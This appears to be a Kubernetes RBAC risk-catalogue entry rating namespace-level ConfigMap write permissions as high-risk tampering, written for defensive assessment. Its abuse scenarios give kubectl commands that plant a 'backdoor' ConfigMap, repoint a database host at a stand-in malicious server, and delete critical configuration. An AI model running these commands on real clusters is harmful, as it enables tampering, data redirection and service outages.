Modify ConfigMaps in a namespace
Tampering
High
Overview
| Field | Value |
|---|---|
| ID | 1025 |
| Name | Modify ConfigMaps in a namespace |
| Risk Category | Tampering |
| Risk Level | High |
| Role Type | Role |
| API Groups | core |
| Resources | configmaps |
| Verbs | create, update, patch, delete |
| Tags | ConfigMapAccess, PotentialPrivilegeEscalation, Tampering |
Description
Grants permission to create, update, patch, or delete ConfigMaps within a specific namespace. This allows an attacker to tamper with application configurations, potentially causing service disruption or enabling further exploitation if applications load malicious settings.
Abuse Scenarios
- Create a new ConfigMap with malicious configuration in the namespace.

      kubectl create configmap <new-cm-name> --from-literal=malicious_setting=true -n <namespace>
      # Example: kubectl create configmap dev-backdoor-config --from-literal=enable_shell=true -n development

- Patch an existing ConfigMap to alter application behavior within the namespace.

      kubectl patch configmap <configmap-name> -n <namespace> --type='json' -p='[{"op": "replace", "path": "/data/<key>", "value": "<new-value>"}]'
      # Example: kubectl patch configmap my-app-config -n production --type='json' -p='[{"op": "replace", "path": "/data/db_host", "value": "malicious-db.example.com"}]'

- Delete a critical ConfigMap within the namespace, causing disruption.

      kubectl delete configmap <configmap-name> -n <namespace>
      # Example: kubectl delete configmap my-app-env -n default